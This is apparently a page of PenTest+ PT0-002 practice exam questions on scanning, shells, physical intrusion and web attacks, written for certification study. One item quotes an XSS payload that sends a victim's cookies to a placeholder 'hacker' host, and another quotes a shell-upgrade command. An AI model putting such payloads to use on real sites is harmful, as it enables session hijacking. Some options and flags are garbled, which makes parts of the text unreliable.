Free CompTIA PenTest+ Certification Exam PT0-002 Exam Practice Test

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

• nmap 192.168.1.1-5 --PU22-25,80
• nmap 192.168.1.1-5 --PA22-25,80
• nmap 192.168.1.1-5 --PS22-25,80
• nmap 192.168.1.1-5 --Ss22-25,80

A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following:python -c 'import pty; pty.spawn('/bin/bash')'Which of the following actions Is the penetration tester performing?

• Privilege escalation
• Upgrading the shell
• Writing a script for persistence
• Building a bind shell

A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?

• Hydra
• John the Ripper
• Cain and Abel
• Medusa

A compliance-based penetration test is primarily concerned with:

• obtaining Pll from the protected network.
• bypassing protection on edge devices.
• determining the efficacy of a specific set of security standards.
• obtaining specific information from the protected network.

A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results?

• Root user
• Local administrator
• Service
• Network administrator

A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

• Shoulder surfing
• Call spoofing
• Badge stealing
• Tailgating
• Dumpster diving
• Email phishing

A penetration tester is performing an assessment against a customer's web application that is hosted in a major cloud provider's environment. The penetration tester observes that the majority of the attacks attempted are being blocked by the organization's WAF. Which of the following attacks would be most likely to succeed?

• Reflected XSS
• Brute-force
• DDoS
• Direct-to-origin

During enumeration, a red team discovered that an external web server was frequented by employees. After compromising the server, which of the following attacks would best support ------------company systems?

• Aside-channel attack
• A command injection attack
• A watering-hole attack
• A cross-site scripting attack

Given the following code:<SCRIPT>var+img=new+Image();img.src=''http://hacker/%20+%20document.cookie;</SCRIPT>Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

• Web-application firewall
• Parameterized queries
• Output encoding
• Session tokens
• Input validation
• Base64 encoding

A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?

• Patch installations
• Successful exploits
• Application failures
• Bandwidth limitations